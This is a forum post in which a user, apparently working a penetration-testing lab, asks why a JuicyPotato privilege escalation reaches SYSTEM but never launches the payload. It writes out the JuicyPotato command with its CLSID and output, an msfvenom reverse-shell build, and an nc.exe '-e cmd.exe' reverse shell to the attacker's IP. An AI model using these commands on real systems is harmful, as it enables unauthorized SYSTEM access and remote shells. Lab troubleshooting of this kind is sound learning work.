hello friends
So I’m trying really hard to get a precompiled x86 juicypotato (I’m to dumb to compile it myself) privesc executing a shell, but all I get is this:
\\10.10.14.10\share\juicypotato_x86.exe -l 9500 -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020} -p C:\inetpub\wwwroot\shell-x86_2.exe
\\10.10.14.10\share\juicypotato_x86.exe -l 9500 -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020} -p C:\inetpub\wwwroot\shell-x86_2.exe
Testing {03ca98d6-ff5d-49b8-abc6-03dd84127020} 9500
......
[+] authresult 0
{03ca98d6-ff5d-49b8-abc6-03dd84127020};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
The shell was generated with this:
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.10 LPORT=5556 -f exe > shell-x86_2.exe
And I’m running the multihandler to get my shell:
windows/generic/shell_reverse_tcp
lhost: 10.10.14.10
lport: 5556
But tried it with netcat as well:
\\10.10.14.10\share\juicypotato_x86.exe -l 9500 -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020} -p C:\inetpub\wwwroot\nc.exe -a "-e cmd.exe 10.10.14.10 5557
Listener: nc -lnvp 5557
It seems, that it’s working (all the time actually) but it NEVER runs my executable afterwards, regardless of where the executable is. (local or via a SMB share)
What am I doing wrong?